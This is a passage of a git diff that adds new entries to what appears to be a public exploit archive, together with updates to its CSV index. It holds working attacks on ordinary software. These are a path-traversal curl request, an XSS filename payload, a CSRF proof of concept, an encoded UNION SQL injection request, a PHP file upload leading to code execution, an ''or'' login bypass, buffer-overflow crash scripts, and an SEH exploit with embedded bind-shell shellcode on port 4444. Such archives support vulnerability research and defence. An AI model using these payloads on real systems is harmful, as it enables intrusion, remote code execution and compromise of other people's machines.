"path=../../../../../../../tmp/&name=hacked.jpg&url=http://s3.amazonaws.com/feather-files-aviary-prod-us-east-1/2444282ef4344e3dacdedc7a78f8877d/2018-10-23/44f0f34961464feb92b53d953b02d4bb.jpg" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/ajax_calls.php?action=save_img" +$ ls /tmp +hacked.jpg + +7. Persistent XSS in `media_preview` action. + +Upload a file with valid media extension (e.g. mp3) with XSS payload in the name. For example, "a\"%2balert(document.cookie)%2b\"".mp3 will trigger `alert(document.cookie)` when previewed. \ No newline at end of file diff --git a/exploits/php/webapps/45992.html b/exploits/php/webapps/45992.html new file mode 100644 index 000000000..7cbefe60d --- /dev/null +++ b/exploits/php/webapps/45992.html @@ -0,0 +1,20 @@ +# Exploit Title: Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery +# Date: 2018-12-13 +# Exploit Author: Veyselxan +# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559?s_rank=38 +# Version: v1 (REQUIRED) +# Tested on: Linux + +# 1 Poof Of Concept (Change password): + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45994.txt b/exploits/php/webapps/45994.txt new file mode 100644 index 000000000..d8d310847 --- /dev/null +++ b/exploits/php/webapps/45994.txt @@ -0,0 +1,36 @@ +# Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - SQL Injection +# Dork: N/A +# Date: 2018-12-14 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559 +# Version: 1.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL] +# + +GET /[PATH]/reviews/campaign_add.php?id=%2d%31%27%20%20%55%4e%49%4f%4e+%53%45%4c%45%43%54+1,%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29,3,4,5,%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33,24,25,%32%36%2c%32%37%2c%32%38%2c%32%39,30--+- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Date: Fri, 14 Dec 2018 18:09:22 GMT +Server: Apache +X-Powered-By: PHP/7.0.33 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45995.txt b/exploits/php/webapps/45995.txt new file mode 100644 index 000000000..705f14ef2 --- /dev/null +++ b/exploits/php/webapps/45995.txt @@ -0,0 +1,84 @@ +# Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution +# Dork: N/A +# Date: 2018-12-14 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559 +# Version: 1.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL] +# + +POST /[PATH]/reviews/action.php?action=custom_reviews HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/octet-stream +Content-Length: 922 +Referer: http://localhost/[PATH]/reviews/custom_reviews_add.php +Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +-----------------------------4704926813981: undefined +Content-Disposition: form-data; name="photo"; filename="phpinfo.php" + +-----------------------------4704926813981 +Content-Disposition: form-data; name="hidden_photo" +-----------------------------4704926813981 +Content-Disposition: form-data; name="name" +Efe +-----------------------------4704926813981 +Content-Disposition: form-data; name="rating" +4.5 +-----------------------------4704926813981 +Content-Disposition: form-data; name="review" +Efe +-----------------------------4704926813981 +Content-Disposition: form-data; name="date" +12/14/2018 +-----------------------------4704926813981 +Content-Disposition: form-data; name="id" +-----------------------------4704926813981 +Content-Disposition: form-data; name="submit" +submit +-----------------------------4704926813981-- +HTTP/1.1 302 Found +Date: Fri, 14 Dec 2018 18:17:48 GMT +Server: Apache +X-Powered-By: PHP/7.0.33 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +location: custom_reviews.php +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +GET /[PATH]/reviews/uploads/264082phpinfo.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: */* +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://localhost/[PATH]/reviews/custom_reviews.php +Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0 +DNT: 1 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Fri, 14 Dec 2018 18:17:49 GMT +Server: Apache +X-Powered-By: PHP/7.0.33 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45997.txt b/exploits/php/webapps/45997.txt new file mode 100644 index 000000000..2823943c2 --- /dev/null +++ b/exploits/php/webapps/45997.txt @@ -0,0 +1,11 @@ +# Exploit Title: Double Your Bitcoin Script Automatic 2018 for $50 - Authentication Bypass +# Date: 2018-12-08 +# Exploit Author: Veyselxan +# Vendor Homepage: https://codeclerks.com/php-programming/1007/Double-Your-Bitcoin-Script-Automatic-2018 +# Version: v1 (REQUIRED) +# Tested on: Linux +http://traget/admin/index.php + +username: '=''or' + +Password: '=''or' \ No newline at end of file diff --git a/exploits/windows/dos/45993.py b/exploits/windows/dos/45993.py new file mode 100755 index 000000000..ef7ea778f --- /dev/null +++ b/exploits/windows/dos/45993.py @@ -0,0 +1,21 @@ +#!/usr/bin/python +# -*- coding: cp1252 -*- +# Exploit Title: Angry IP Scanner 3.5.3 Denial of Service (PoC) +# Author: Fernando Cruz +# Date: 13/12/2018 +# Vendor Homepage: https://angryip.org +# Tested Version: 3.11 +# Tested on Windows 10 Pro, 64-bit + +# Steps to Produce the Crash: +# 1.- Run python code : python angryip.py +# 2.- Open angryip.txt and copy content to clipboard +# 3.- Open Angry IP Scanner +# 4.- Go to "Herramientas" in toolbar, click on "Preferencias", then in the tap "Mostrar", +# 5.- Paste ClipBoard on "El valor no está disponible (sin resultados):", and click on "OK", +# 6.- Crashed + +buffer = "\x41" * 44455293 +f = open("angryip.txt" , 'w') +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/45996.py b/exploits/windows/dos/45996.py new file mode 100755 index 000000000..b230798ea --- /dev/null +++ b/exploits/windows/dos/45996.py @@ -0,0 +1,27 @@ +# Exploit Title: UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC) and Pointer to next SEH and SE handler records overwrite +# Discovery by: Francisco Ramirez +# Discovery Date: 2018-12-14 +# Vendor Homepage: https://www.ultraiso.com/ +# Software Link : https://www.ultraiso.com/download.html +# Tested Version: 9.7.1.3519 +# Tested on: Windows 10 Pro - 64 bit +# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow + +# Steps to Produce the Crash: +# 1.- Run python code : python UltraISO_9.7.1.3519.py +# 2.- Open UltraISO_9.7.1.3519.txt and copy content to clipboard +# 3.- Open UltraISO_9.7.1.3519 +# 4.- In the Window select 'Tools' > 'Make CD/DVD Image' +# 5.- In the field 'Output FileName' remove the default path. +# 6.- Paste the content of UltraISO_9.7.1.3519.txt into the field: 'Output FileName' +# 7.- Click 'Make' and you will see a crash. + +#!/usr/bin/env python + +a_letters = "\x41" * 304 +seRecord = "\x42" * 4 +sehRecord = "\x43" * 4 +buffer = a_letters + seRecord + sehRecord +f = open ("UltraISO_9.7.1.3519.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/45988.py b/exploits/windows/local/45988.py new file mode 100755 index 000000000..12fc88a39 --- /dev/null +++ b/exploits/windows/local/45988.py @@ -0,0 +1,89 @@ +#Exploit Title: Zortam MP3 Media Studio Version 24.15 Exploit (SEH) +#Version: 24.15 +#Exploit Author: Manpreet Singh Kheberi +#Date: December 13 2018 +#Download Link: https://www.zortam.com/download.html +#Vendor Homepage: https://www.zortam.com +#Tested on: Windows Xp Sp3 x64 +#Type: Bind shell +print "-----------------------------------------------------------------------------------------------------------------------" +print " Zortam MP3 media studio Exploit (SEH) " +print " by Manpreet Singh Kheberi " +print "Generated File zortam-exploit.txt " +print "INSTRUCTIONS:" +print "Go to File > New mp3 Library > Yes > Paste the payload in select textfield > click ok > You have a shell on port 4444 " +print "-----------------------------------------------------------------------------------------------------------------------" + + +filename = "zortam-exploit.txt" +junk = "\x41"*268 +nseh="\x90\x90\xeb\x12" + +seh ="\x8e\x32\xb5\x02" + +nop="\x90"*19 +brk="\x90\x90\x90\x90" + +# bind shell generated using metasploit +#msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python +# This will open a bind shell on port 4444 +# use ncat Target-IP 4444 + +buf = "" +buf += "\xda\xdf\xbd\xb7\x95\xd2\xc2\xd9\x74\x24\xf4\x5b\x33" +buf += "\xc9\xb1\x53\x83\xeb\xfc\x31\x6b\x13\x03\xdc\x86\x30" +buf += "\x37\xde\x41\x36\xb8\x1e\x92\x57\x30\xfb\xa3\x57\x26" +buf += "\x88\x94\x67\x2c\xdc\x18\x03\x60\xf4\xab\x61\xad\xfb" +buf += "\x1c\xcf\x8b\x32\x9c\x7c\xef\x55\x1e\x7f\x3c\xb5\x1f" +buf += "\xb0\x31\xb4\x58\xad\xb8\xe4\x31\xb9\x6f\x18\x35\xf7" +buf += "\xb3\x93\x05\x19\xb4\x40\xdd\x18\x95\xd7\x55\x43\x35" +buf += "\xd6\xba\xff\x7c\xc0\xdf\x3a\x36\x7b\x2b\xb0\xc9\xad" +buf += "\x65\x39\x65\x90\x49\xc8\x77\xd5\x6e\x33\x02\x2f\x8d" +buf += "\xce\x15\xf4\xef\x14\x93\xee\x48\xde\x03\xca\x69\x33" +buf += "\xd5\x99\x66\xf8\x91\xc5\x6a\xff\x76\x7e\x96\x74\x79" +buf += "\x50\x1e\xce\x5e\x74\x7a\x94\xff\x2d\x26\x7b\xff\x2d" +buf += "\x89\x24\xa5\x26\x24\x30\xd4\x65\x21\xf5\xd5\x95\xb1" +buf += "\x91\x6e\xe6\x83\x3e\xc5\x60\xa8\xb7\xc3\x77\xcf\xed" +buf += "\xb4\xe7\x2e\x0e\xc5\x2e\xf5\x5a\x95\x58\xdc\xe2\x7e" +buf += "\x98\xe1\x36\xea\x90\x44\xe9\x09\x5d\x36\x59\x8e\xcd" +buf += "\xdf\xb3\x01\x32\xff\xbb\xcb\x5b\x68\x46\xf4\x72\x35" +buf += "\xcf\x12\x1e\xd5\x99\x8d\xb6\x17\xfe\x05\x21\x67\xd4" +buf += "\x3d\xc5\x20\x3e\xf9\xea\xb0\x14\xad\x7c\x3b\x7b\x69" +buf += "\x9d\x3c\x56\xd9\xca\xab\x2c\x88\xb9\x4a\x30\x81\x29" +buf += "\xee\xa3\x4e\xa9\x79\xd8\xd8\xfe\x2e\x2e\x11\x6a\xc3" +buf += "\x09\x8b\x88\x1e\xcf\xf4\x08\xc5\x2c\xfa\x91\x88\x09" +buf += "\xd8\x81\x54\x91\x64\xf5\x08\xc4\x32\xa3\xee\xbe\xf4" +buf += "\x1d\xb9\x6d\x5f\xc9\x3c\x5e\x60\x8f\x40\x8b\x16\x6f" +buf += "\xf0\x62\x6f\x90\x3d\xe3\x67\xe9\x23\x93\x88\x20\xe0" +buf += "\xa3\xc2\x68\x41\x2c\x8b\xf9\xd3\x31\x2c\xd4\x10\x4c" +buf += "\xaf\xdc\xe8\xab\xaf\x95\xed\xf0\x77\x46\x9c\x69\x12" +buf += "\x68\x33\x89\x37" + +#boom+= "\xCC\xCC\xCC\xCC" +#calc.exe + + +# Used for initial exploit development phase +bchar = "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10" +bchar += "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20" +bchar +="x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30" +bchar +="x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40" +bchar +="x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50" +bchar +="x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60" +bchar +="x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70" +bchar +="x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80" +bchar +="x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90" +bchar +="x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0" +bchar +="xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0" +bchar +="xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0" +bchar +="xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0" +bchar +="xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0" +bchar +="xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0" +bchar +="xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff" + + + +exploit = junk+nseh+seh+nop+brk+buf +textfile = open(filename,"w") +textfile.write(exploit) +textfile.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index fa00ac936..8bc6ca9b2 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6212,6 +6212,8 @@ id,file,description,date,author,type,platform,port 45968,exploits/windows/dos/45968.py,"LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)",2018-12-11,"Gionathan Reale",dos,windows, 45983,exploits/linux/dos/45983.txt,"Linux - 'userfaultfd' Bypasses tmpfs File Permissions",2018-12-13,"Google Security Research",dos,linux, 45984,exploits/multiple/dos/45984.html,"WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains",2018-12-13,"Google Security Research",dos,multiple, +45993,exploits/windows/dos/45993.py,"Angry IP Scanner 3.5.3 - Denial of Service (PoC)",2018-12-14,"Fernando Cruz",dos,windows, +45996,exploits/windows/dos/45996.py,"UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC)",2018-12-14,"Francisco Ramirez",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10145,6 +10147,7 @@ id,file,description,date,author,type,platform,port 45960,exploits/multiple/local/45960.txt,"XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection",2018-12-11,"Google Security Research",local,multiple, 45961,exploits/windows/local/45961.txt,"McAfee True Key - McAfee.TrueKey.Service Privilege Escalation",2018-12-11,"Google Security Research",local,windows, 45985,exploits/windows/local/45985.rb,"CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)",2018-12-13,Metasploit,local,windows, +45988,exploits/windows/local/45988.py,"Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)",2018-12-14,"Manpreet Singh Kheberi",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17002,6 +17005,8 @@ id,file,description,date,author,type,platform,port 45926,exploits/windows/remote/45926.py,"CyberArk 9.7 - Memory Disclosure",2018-12-03,"Thomas Zuk",remote,windows,1858 45939,exploits/linux/remote/45939.py,"OpenSSH < 7.7 - User Enumeration (2)",2018-12-04,"Leap Security",remote,linux,22 45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080 +45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443 +45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -38035,7 +38040,7 @@ id,file,description,date,author,type,platform,port 43590,exploits/php/webapps/43590.txt,"PerfexCRM 1.9.7 - Arbitrary File Upload",2018-01-15,"Ahmad Mahfouz",webapps,php, 43591,exploits/php/webapps/43591.txt,"RISE 1.9 - 'search' SQL Injection",2018-01-15,"Ahmad Mahfouz",webapps,php, 43592,exploits/jsp/webapps/43592.txt,"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect",2018-01-15,"Andrew Gill",webapps,jsp, -43593,exploits/php/webapps/43593.py,"Adminer 4.3.1 - Server-Side Request Forgery",2018-01-15,hyp3rlinx,webapps,php, +43593,exploits/php/webapps/43593.txt,"Adminer 4.3.1 - Server-Side Request Forgery",2018-01-15,hyp3rlinx,webapps,php, 43594,exploits/java/webapps/43594.txt,"Oracle PeopleSoft 8.5x - Remote Code Execution",2018-01-15,"Vahagn Vardanyan",webapps,java, 43595,exploits/php/webapps/43595.txt,"ILIAS < 5.2.4 - Cross-Site Scripting",2018-01-15,"Florian Kunushevci",webapps,php, 43600,exploits/php/webapps/43600.txt,"Flash Operator Panel 2.31.03 - Command Execution",2018-01-15,Vulnerability-Lab,webapps,php,80 @@ -40480,3 +40485,11 @@ id,file,description,date,author,type,platform,port 45977,exploits/php/webapps/45977.txt,"WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection",2018-12-11,Kaimi,webapps,php,80 45978,exploits/php/webapps/45978.txt,"ThinkPHP 5.0.23/5.1.31 - Remote Code Execution",2018-12-11,VulnSpy,webapps,php,80 45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple, +45987,exploits/php/webapps/45987.txt,"Responsive FileManager 9.13.4 - Multiple Vulnerabilities",2018-12-14,"Fariskhi Vidyan",webapps,php, +45989,exploits/multiple/webapps/45989.txt,"Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure",2018-12-14,alt3kx,webapps,multiple, +45990,exploits/multiple/webapps/45990.txt,"Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2)",2018-12-14,alt3kx,webapps,multiple, +45991,exploits/hardware/webapps/45991.py,"Huawei Router HG532e - Command Execution",2018-12-14,Rebellion,webapps,hardware, +45992,exploits/php/webapps/45992.html,"Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery (Change Admin Password)",2018-12-14,Veyselxan,webapps,php, +45994,exploits/php/webapps/45994.txt,"Facebook And Google Reviews System For Businesses 1.1 - SQL Injection",2018-12-14,"Ihsan Sencan",webapps,php, +45995,exploits/php/webapps/45995.txt,"Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution",2018-12-14,"Ihsan Sencan",webapps,php, +45997,exploits/php/webapps/45997.txt,"Double Your Bitcoin Script Automatic - Authentication Bypass",2018-12-14,Veyselxan,webapps,php,